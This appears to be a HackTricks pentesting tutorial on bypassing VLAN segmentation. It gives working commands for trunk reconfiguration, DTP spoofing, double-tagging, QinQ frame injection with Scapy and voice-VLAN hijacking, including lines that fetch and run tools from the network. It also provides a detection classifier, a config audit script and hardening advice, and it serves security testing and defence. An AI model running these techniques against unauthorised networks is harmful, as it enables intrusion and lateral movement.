Lateral VLAN Segmentation Bypass


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (for further details check https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Initially, the specific port the attacker is connected to must be identified. This can typically be done through CDP messages, or by filtering switch output with the `| include` mask.

If CDP is not operational, port identification can be attempted by searching for the MAC address:

```
SW1(config)# show mac address-table | include 0050.0000.0500
```

Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.

```
SW1# show vlan brief
```

Transitioning to trunk mode entails entering interface configuration mode:

```
SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
```

Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.

Virtual interfaces are then created, assigned VLAN IDs, and activated:

```bash
# Legacy (vconfig) – still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

# Modern (ip-link – preferred): create and bring up the same four sub-interfaces
sudo modprobe 8021q
for vid in 10 20 50 60; do
  sudo ip link add link eth0 name eth0.$vid type vlan id $vid
  sudo ip link set eth0.$vid up
done

# Request addresses on VLANs 50 and 60 via DHCP (10 and 20 are handled below)
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```

Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:

```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
```

Example for manually setting a static IP address on an interface (VLAN 10):

```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
# or
sudo ip addr add 10.10.10.66/24 dev eth0.10
```

Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.

Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.


Other VLAN-Hopping Techniques (no privileged switch CLI)

The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a regular access port. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:

1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)

Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single DTP “desirable” or “trunk” frame converts the access port into an 802.1Q trunk that carries all allowed VLANs.

Yersinia and several PoCs automate the process:

```bash
# Become a trunk using Yersinia (GUI)
sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking

# Python PoC (dtp-spoof)
git clone https://github.com/fleetcaptain/dtp-spoof.git
sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```

Recon helper (passively fingerprint the port’s DTP state):

```bash
# Manual check: bring up a tagged sub-interface; if hosts in VLAN 30 answer,
# the port is already passing tagged frames
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up

# or passively sniff DTP frames and report the port's negotiation state
wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
sudo python3 dtpscan.py -i eth0
```

Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.

2. Double-Tagging (Native-VLAN Abuse)

If the attacker sits on the native (untagged) VLAN, a crafted frame with two 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as VLANPWN DoubleTagging.py (2022-2025 refresh) automates the injection:

```bash
python3 DoubleTagging.py \
        --interface eth0 \
        --nativevlan 1 \
        --targetvlan 20 \
        --victim 10.10.20.24 \
        --attacker 10.10.1.54
```

3. QinQ (802.1ad) Stacking

Many enterprise cores support Q-in-Q service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype 0x88a8 and attempt to pop the outer tag with Scapy:

```python
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

outer = 100      # Service tag (S-tag, ethertype 0x88a8)
inner = 30       # Customer / target VLAN (C-tag, ethertype 0x8100)

# The 802.1ad ethertype belongs on the Ethernet header, and each tag's "type"
# field names the header that follows it, so the stacking is
# Ether -> S-tag -> C-tag -> IP rather than a tag placed before the Ether header.
frame = (Ether(dst="ff:ff:ff:ff:ff:ff", type=0x88a8)
         / Dot1Q(vlan=outer, type=0x8100)
         / Dot1Q(vlan=inner)
         / IP(dst="10.10.30.1") / ICMP())
sendp(frame, iface="eth0")
```
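
Sections 1 to 3 above all leave a recognisable signature on the wire: a DTP frame arriving on a user port, or a frame carrying two VLAN tags (0x8100/0x8100 for double-tagging, 0x88a8/0x8100 for QinQ). The following classifier, an added example that is not part of the original page or of any of the tools it names, parses raw Ethernet frames and flags those signals; it is the kind of check a port monitor or IDS rule would run. The sample frames are constructed inline (the source MAC reuses the page's 0050.0000.0500), the DTP SNAP protocol id 0x2004 and the 01:00:0c:cc:cc:cc destination are the standard Cisco values, and the `make_frame` helper is only there to build the samples.

```python
"""Classify raw Ethernet frames for the Layer-2 signals a switch-port monitor
cares about: DTP trunk negotiation, double-tagged 802.1Q frames and 802.1ad
(QinQ) stacking.  All sample frames are constructed inline; nothing is read
from a live network."""
import struct

ETH_8021Q = 0x8100            # C-tag TPID
ETH_8021AD = 0x88A8           # S-tag TPID (802.1ad)
DTP_MULTICAST = bytes.fromhex("01000ccccccc")   # Cisco DTP/VTP/PAgP destination MAC
CISCO_OUI = bytes.fromhex("00000c")
DTP_SNAP_PID = 0x2004         # SNAP protocol id used by DTP


def parse_frame(frame: bytes) -> dict:
    """Walk the Ethernet header and any stacked VLAN tags."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src = frame[:6], frame[6:12]
    off, tags = 12, []
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    while ethertype in (ETH_8021Q, ETH_8021AD) and len(frame) >= off + 6:
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        tags.append((ethertype, tci & 0x0FFF))      # (TPID, VLAN id)
        off += 4
        ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    is_dtp = False
    # 802.3 frames carry a length (<= 1500) instead of an ethertype, followed by
    # LLC/SNAP: DSAP 0xAA, SSAP 0xAA, CTRL 0x03, OUI (3 bytes), PID (2 bytes).
    if ethertype <= 1500 and dst == DTP_MULTICAST:
        snap = frame[off + 2:off + 10]
        if len(snap) == 8 and snap[:3] == b"\xaa\xaa\x03" and snap[3:6] == CISCO_OUI:
            is_dtp = struct.unpack("!H", snap[6:8])[0] == DTP_SNAP_PID
    return {"src": src.hex(":"), "dst": dst.hex(":"), "tags": tags,
            "ethertype": ethertype, "dtp": is_dtp}


def classify(frame: bytes) -> list:
    """Return human-readable findings for one frame seen on an access port."""
    info = parse_frame(frame)
    findings = []
    if info["dtp"]:
        findings.append(f"DTP from {info['src']}: trunk negotiation on an access port "
                        "(expect 'switchport nonegotiate')")
    if len(info["tags"]) >= 2:
        (outer_tpid, outer_vid), (_, inner_vid) = info["tags"][:2]
        kind = "QinQ/802.1ad" if outer_tpid == ETH_8021AD else "double-tagged 802.1Q"
        note = " (outer tag is the default native VLAN)" if outer_vid == 1 else ""
        findings.append(f"{kind} from {info['src']}: outer VLAN {outer_vid}, "
                        f"inner VLAN {inner_vid}{note}")
    return findings


def make_frame(dst: str, src: str, tags, ethertype: int, payload: bytes = b"") -> bytes:
    """Build a constructed sample frame; tags is a list of (TPID, VLAN id)."""
    hdr = bytes.fromhex(dst) + bytes.fromhex(src)
    for tpid, vid in tags:
        hdr += struct.pack("!HH", tpid, vid & 0x0FFF)
    return hdr + struct.pack("!H", ethertype) + payload


SRC = "005000000500"                  # constructed source MAC (00:50:00:00:05:00)
IPV4_STUB = b"\x45" + b"\x00" * 19    # constructed placeholder IPv4 header
SAMPLE_FRAMES = {
    # DTP: 802.3 length field, then SNAP header with Cisco OUI and PID 0x2004
    "dtp": make_frame("01000ccccccc", SRC, [], 0x0030,
                      b"\xaa\xaa\x03" + CISCO_OUI + b"\x20\x04" + b"\x01" * 20),
    # Ordinary tagged frame for VLAN 10 carrying IPv4
    "single_tag": make_frame("ffffffffffff", SRC, [(ETH_8021Q, 10)], 0x0800, IPV4_STUB),
    # Double tag: native VLAN 1 outside, VLAN 20 inside
    "double_tag": make_frame("ffffffffffff", SRC, [(ETH_8021Q, 1), (ETH_8021Q, 20)], 0x0800, IPV4_STUB),
    # QinQ: S-tag 100 outside, C-tag 30 inside
    "qinq": make_frame("ffffffffffff", SRC, [(ETH_8021AD, 100), (ETH_8021Q, 30)], 0x0800, IPV4_STUB),
}

if __name__ == "__main__":
    for name, frame in SAMPLE_FRAMES.items():
        print(f"{name:11s} -> {classify(frame) or ['clean']}")
```

Only the first two tags are reported, which is enough to distinguish the two stacking cases; a priority-tagged frame (VLAN id 0) is treated like any other single tag. To run it over real traffic, feed `classify()` the raw bytes of each captured frame from a pcap reader.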

4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)

Corporate access ports often sit in an “access + voice” configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled.

VoIP Hopper (packaged in Kali 2025.2) supports CDP, DHCP options 176/242, and full LLDP-MED spoofing:

```bash
# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940

# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z

# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN
```

The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models.


Defensive Recommendations

  1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
  2. Change the native VLAN on every trunk to an unused, black-hole VLAN and tag it: `vlan dot1q tag native`.
  3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
  4. Enforce port security, DHCP snooping, dynamic ARP inspection and 802.1X to limit rogue Layer-2 activity.
  5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isn’t required.
  6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
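
Recommendations 1 to 4 can be checked mechanically against a switch's running-config. The audit script below is an added example, not part of the original page or of any vendor tool: it splits an IOS-style config into interface stanzas and reports ports that still negotiate DTP, trunks left on native VLAN 1 or carrying every VLAN, voice-VLAN ports without 802.1X, and missing global `vlan dot1q tag native` / `ip dhcp snooping`. The configuration text is constructed for the example; the interface names and VLAN numbers in it are assumptions, and the 802.1X check simply looks for `authentication port-control auto`.

```python
"""Audit a Cisco IOS-style running-config against the VLAN hardening
recommendations listed above.  SAMPLE_CONFIG is constructed for this example."""
import re

SAMPLE_CONFIG = """\
!
vlan dot1q tag native
ip dhcp snooping
!
interface GigabitEthernet0/1
 description user port - hardened
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
 spanning-tree portfast
!
interface GigabitEthernet0/2
 description user port - weak (no explicit mode, voice VLAN, no 802.1X)
 switchport access vlan 10
 switchport voice vlan 50
!
interface GigabitEthernet0/23
 description uplink - weak
 switchport mode trunk
!
interface GigabitEthernet0/24
 description uplink - hardened
 switchport trunk encapsulation dot1q
 switchport mode trunk
 switchport trunk native vlan 999
 switchport trunk allowed vlan 10,20
!
"""


def parse_interfaces(config: str) -> dict:
    """Return {interface name: [stripped config lines]} for every stanza."""
    ifaces, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            ifaces[current] = []
        elif line.startswith(" ") and current is not None:
            ifaces[current].append(line.strip())
        else:
            current = None            # "!" or a global command ends the stanza
    return ifaces


def audit_interface(name: str, lines: list) -> list:
    """Findings for one interface, keyed to the recommendations above."""
    findings = []
    mode = next((l.split()[2] for l in lines if l.startswith("switchport mode ")), None)
    if mode == "trunk":
        native = next((l.split()[-1] for l in lines
                       if l.startswith("switchport trunk native vlan ")), "1")
        if native == "1":
            findings.append(f"{name}: trunk uses default native VLAN 1 (rec. 2)")
        if not any(l.startswith("switchport trunk allowed vlan ") for l in lines):
            findings.append(f"{name}: trunk carries all VLANs, no pruning (rec. 3)")
    else:
        if mode != "access":
            findings.append(f"{name}: no 'switchport mode access', DTP may negotiate a trunk (rec. 1)")
        if "switchport nonegotiate" not in lines:
            findings.append(f"{name}: DTP not disabled, missing 'switchport nonegotiate' (rec. 1)")
        has_voice = any(l.startswith("switchport voice vlan ") for l in lines)
        if has_voice and "authentication port-control auto" not in lines:
            findings.append(f"{name}: voice VLAN without 802.1X (rec. 4)")
    return findings


def audit_config(config: str) -> list:
    """Global checks plus every interface stanza."""
    globals_ = set(config.splitlines())
    findings = []
    if "vlan dot1q tag native" not in globals_:
        findings.append("global: native VLAN untagged on trunks, missing 'vlan dot1q tag native' (rec. 2)")
    if "ip dhcp snooping" not in globals_:
        findings.append("global: DHCP snooping disabled (rec. 4)")
    for name, lines in parse_interfaces(config).items():
        findings.extend(audit_interface(name, lines))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

The expected result on the sample is five findings: three for GigabitEthernet0/2 and two for GigabitEthernet0/23, none for the hardened ports or the global commands. Pasting a real `show running-config` into `SAMPLE_CONFIG` (or reading it from a file) is all that is needed to reuse the checks.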

Real-World Vendor Vulnerabilities (2022-2024)

Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include:

  • CVE-2022-20728 – Cisco Aironet/Catalyst Access Points allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation.
  • CVE-2024-20465 (Cisco IOS Industrial Ethernet) permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later.

Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current.

